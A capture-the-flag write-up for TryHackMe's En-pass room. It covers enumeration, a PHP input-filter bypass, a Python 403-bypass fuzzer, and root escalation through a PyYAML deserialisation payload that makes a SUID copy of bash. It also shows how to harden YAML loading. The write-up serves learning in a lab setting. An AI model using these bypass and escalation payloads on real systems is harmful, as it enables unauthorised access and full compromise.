En-pass — TryHackMe

This is the write-up for TryHackMe's room named En-pass ("Get what you can't"). The room can be found at this URL:

https://tryhackme.com/room/enpass

Enumeration

NMAP

# Identify the list of services running on the target machine
⇒ sudo nmap -sS -Pn -T4 -p- 10.10.248.167

# Perform further information gathering on the open ports identified above
⇒ sudo nmap -O -A -Pn -T4 -p22,8001 10.10.248.167

So we have SSH on port 22 and a website on port 8001. First let's explore the website. Opening it in a browser shows some images with text printed on them. The text is also in the page source, so we can read all of it with view source:

Ehvw ri Oxfn!! is a Caesar cipher of Best of Luck!! with a shift of 3.

U2FkCg== is base64 for Sad.

Well, it looks like we were trolled.

Gobuster

Time to do directory brute forcing. Let's use gobuster:

gobuster dir -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -x .php,.html,.txt -u http://10.10.240.162:8001 -t 40

Explore /reg.php, found above:

If we submit something, e.g. 1234, the server's response contains the PHP code of the input filter (the code itself is not reproduced in this write-up).

We need to bypass the filter in that code to move forward. Reading the code, the following conditions must be met for the input to pass:

  • Lowercase/uppercase letters and digits are not allowed.
  • The input is split into chunks on ',' as the delimiter, and each chunk must have the length required by the code. A sum variable is incremented for every condition that matches and is finally compared with 9; only when it equals 9 do we get the result, which is the way forward.

I used an online PHP compiler to debug the code and finally worked out an input that yields the result. Symbols are allowed, so I used '$' and made each chunk the required length.

Submitting this input returned a password:

$$,$$,$$,$$$,$$,$$,$$,$$,$$$
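The filter as described above, modelled in Python as an added example. This is not the room's reg.php (its source is not reproduced in the write-up); it is a reconstruction of the described checks, and the list of chunk lengths is inferred from the input that worked, so the real PHP may differ in detail. It also includes a small builder that produces a passing input from any single non-alphanumeric symbol.

```python
"""Model of the reg.php filter as the write-up describes it (added example,
not the room's code). Chunk lengths are INFERRED from the author's working
input $$,$$,$$,$$$,$$,$$,$$,$$,$$$ and are an assumption about the real PHP."""
import re

# Assumed per-chunk lengths, read off the input that passed the filter.
EXPECTED_LENGTHS = [2, 2, 2, 3, 2, 2, 2, 2, 3]

ALNUM = re.compile(r"[A-Za-z0-9]")


def passes_filter(user_input: str, lengths=EXPECTED_LENGTHS) -> bool:
    """Return True when the input satisfies the described conditions:
    no letters or digits anywhere, a comma-split chunk list of the right
    size, and a 'sum' of matched length conditions that reaches 9."""
    if ALNUM.search(user_input):
        return False
    chunks = user_input.split(",")
    if len(chunks) != len(lengths):
        return False
    # One point per chunk whose length matches; the PHP compares the sum to 9.
    total = sum(1 for chunk, want in zip(chunks, lengths) if len(chunk) == want)
    return total == 9


def build_input(symbol: str = "$", lengths=EXPECTED_LENGTHS) -> str:
    """Construct a passing input by repeating one non-alphanumeric symbol
    to each required length; '$' reproduces the input used in the write-up."""
    if len(symbol) != 1 or ALNUM.fullmatch(symbol):
        raise ValueError("symbol must be a single non-alphanumeric character")
    return ",".join(symbol * want for want in lengths)


if __name__ == "__main__":
    candidate = build_input("$")
    print(candidate, passes_filter(candidate))
```

Any symbol works, so `build_input("#")` is an equally valid answer; what matters is the chunk count and the per-chunk lengths, not the character used.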

Exploring the /web directory found above with gobuster turns up one more directory, named resources:

gobuster dir -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -x .php,.html,.txt -u http://10.10.240.162:8001/web -t 40

Exploring these directories further with gobuster gives us our first answer, the path. Browsing to this path gives an encrypted private key, which we download with wget:

We now have a password and an encrypted private key. Let's decrypt the key with openssl, entering the password from reg.php when prompted for the passphrase (ssh rejects a key file that is readable by other users, so restrict its permissions before use):

openssl rsa -in key -out id_rsa

Using this private key (and the password as its passphrase), I tried a few usernames found earlier, sadman, sau and cimihan, but none of them worked. There must be a different username we still need to find. During directory brute forcing we also saw a page /403.php, and the room's hint is "The path you get will forbid to see but you can bypass it." So to move forward we need to bypass 403.php somehow. Searching around, I found this tool, which can "Fuzz 403ing endpoints for bypasses":

https://github.com/intrudir/403fuzzer

This tool can send its requests through a proxy, so start Burp Suite with intercept off and analyse the requests and responses there. Run the tool as:

python 403fuzzer.py -u http://10.10.141.184:8001/403.php --proxy http://localhost:8080

Sorting the Proxy history in Burp Suite by status code, one request/response pair stands out with a different response. That response contains a new username.
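The idea behind a 403 fuzzer, as an added example in Python (this is not 403fuzzer's own code): replay the forbidden request with a series of small path, header and method mutations, and report every variant whose status code differs from the baseline, which is the same "sort by status code" filter applied above in Burp. The mutation list is a small sample of well-known tricks, not the tool's full list. The sender is injected as a callable so the code runs offline; `mock_target` is a constructed stand-in whose access rule (trusting a loopback X-Forwarded-For) is invented for the demonstration and says nothing about which bypass actually worked on the room.

```python
"""Minimal 403-bypass fuzzer (added example, not 403fuzzer's code).
Mutations are a sample of common tricks; mock_target is CONSTRUCTED."""
from typing import Callable, Dict, List, Tuple
from urllib.parse import urlsplit, urlunsplit

Request = Tuple[str, str, Dict[str, str]]            # (method, url, headers)
Sender = Callable[[str, str, Dict[str, str]], int]   # returns HTTP status

# Path-level tricks that sometimes slip past prefix/extension based rules.
PATH_SUFFIXES = ["/", "/.", "..;/", "%20", "%09", "%2e", "?", "??", "#", ".json", ".html"]
# Headers some front-ends honour as "the real path" when the request is for /.
REWRITE_HEADERS = ["X-Original-URL", "X-Rewrite-URL"]
# Headers that can make an IP allow-list think the client is local.
CLIENT_HEADERS = {
    "X-Forwarded-For": "127.0.0.1",
    "X-Forwarded-Host": "localhost",
    "X-Real-IP": "127.0.0.1",
    "X-Custom-IP-Authorization": "127.0.0.1",
    "Referer": "http://localhost/",
}
# Rules written only for GET sometimes ignore other verbs.
METHODS = ["POST", "HEAD", "OPTIONS", "TRACE", "PATCH"]


def mutations(url: str) -> List[Request]:
    """Build every request variant for one forbidden URL."""
    parts = urlsplit(url)
    path = parts.path or "/"
    root = urlunsplit(parts._replace(path="/", query="", fragment=""))
    reqs: List[Request] = []
    for suffix in PATH_SUFFIXES:
        reqs.append(("GET", urlunsplit(parts._replace(path=path + suffix)), {}))
    for name in REWRITE_HEADERS:
        reqs.append(("GET", root, {name: path}))
    for name, value in CLIENT_HEADERS.items():
        reqs.append(("GET", url, {name: value}))
    for method in METHODS:
        reqs.append((method, url, {}))
    return reqs


def find_bypasses(url: str, send: Sender) -> List[Tuple[Request, int]]:
    """Send the baseline, then each mutation; return the ones whose status
    differs from the baseline so an analyst can inspect them by hand."""
    baseline = send("GET", url, {})
    hits: List[Tuple[Request, int]] = []
    for req in mutations(url):
        status = send(*req)
        if status != baseline:
            hits.append((req, status))
    return hits


def mock_target(method: str, url: str, headers: Dict[str, str]) -> int:
    """CONSTRUCTED stand-in for the target, not the room's real behaviour:
    everything is 403 unless the request claims a loopback source address."""
    if headers.get("X-Forwarded-For") == "127.0.0.1":
        return 200
    return 403


if __name__ == "__main__":
    for req, status in find_bypasses("http://10.10.141.184:8001/403.php", mock_target):
        print(status, req)
```

To run it against a live target, replace `mock_target` with a function that issues the request (for example with `requests.request(method, url, headers=headers, allow_redirects=False).status_code`) and keep the proxy setting so every variant is still visible in Burp.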

Let's use this username to SSH in with the private key:

ssh -i id_rsa USERNAME@10.10.141.184

We are in with the new username and can collect the user flag.

Privilege Escalation

Upgrade the shell with the following command so that it is more usable:

/usr/bin/script -qc /bin/bash /dev/null

Running both linPEAS and LSE (linux-smart-enumeration) turned up nothing obvious. Browsing the file system manually, I found one interesting script at /opt/scripts/file.py:

imsau@enpass:/opt/scripts$ cat file.py 
#!/usr/bin/python
import yaml
class Execute():
    def __init__(self,file_name ="/tmp/file.yml"):
        self.file_name = file_name
        self.read_file = open(file_name ,"r")
    def run(self):
        return self.read_file.read()
data = yaml.load(Execute().run())

This looks like our way to root. The file is owned by root, but there is no visible cron job executing it. Looking closely, the constructor reads /tmp/file.yml, yet no such file exists in /tmp. Maybe root is consuming and deleting it. Let's confirm by creating a file with that name in /tmp:

Sure enough, file.yml is deleted every minute, which suggests root runs file.py on it periodically. The script passes the file's contents to yaml.load with no loader specified, and this link describes the issue we can exploit:

https://github.com/yaml/pyyaml/wiki/PyYAML-yaml.load(input)-Deprecation

python -c 'import yaml; yaml.load("!!python/object/new:os.system [echo EXPLOIT!]")'

We will create a file /tmp/file.yml with the following content:

!!python/object/new:os.system ["cp /bin/bash /tmp; chmod +s /tmp/bash"]
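What the two loaders do with this tag family, as an added example in Python (not the room's file.py or PyYAML's own code). The constructed payload uses a harmless `os.getcwd` call instead of `os.system` so it can run anywhere, but the mechanism is exactly what the /tmp/file.yml payload relies on: a `!!python/object/...` tag makes the loader import a module and call a callable at parse time. `load_untrusted` reproduces the behaviour of the old default loader that file.py gets on the box; `load_safely` is the hardened replacement. Current PyYAML releases also refuse these tags in the default FullLoader, which is why the pinned-down `UnsafeLoader` is named explicitly here.

```python
"""PyYAML deserialisation demo (added example, not code from the room).
PAYLOAD is constructed; it calls os.getcwd instead of os.system."""
import os
import re

import yaml

# Same tag family as the write-up's os.system one-liner, but harmless.
PAYLOAD = "!!python/object/apply:os.getcwd []"

# Quick triage check for untrusted YAML before it reaches any loader.
PYTHON_TAG = re.compile(r"!!python/")


def load_untrusted(text: str):
    """What the room's file.py effectively does on old PyYAML: a loader that
    honours python/object tags, so the named callable runs during parsing."""
    return yaml.load(text, Loader=yaml.UnsafeLoader)


def load_safely(text: str):
    """Hardened replacement. SafeLoader only knows the standard YAML types and
    raises ConstructorError for every !!python tag; callers get (ok, value)."""
    try:
        return True, yaml.safe_load(text)
    except yaml.YAMLError as exc:
        return False, type(exc).__name__


def has_python_tag(text: str) -> bool:
    """Defence-in-depth: reject documents carrying python-specific tags."""
    return bool(PYTHON_TAG.search(text))


if __name__ == "__main__":
    print("unsafe loader ran os.getcwd ->", load_untrusted(PAYLOAD))
    print("safe loader ->", load_safely(PAYLOAD))
    print("tag check ->", has_python_tag(PAYLOAD))
```

On the box the call is `os.system` and the argument is the `cp`/`chmod +s` command from the payload above; because root is the process reading the file, the command runs as root.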

After a minute or so we have a SUID copy of bash in /tmp. Run it with the -p option (so bash keeps the effective UID instead of dropping it) to get a root shell and the root flag:

That's all. Thanks for reading. Have a nice one.

0xsanz
Software Developer having keen interest in Security, Privacy and Pen-testing. Certs:- Security+,PenTest+,AZ900
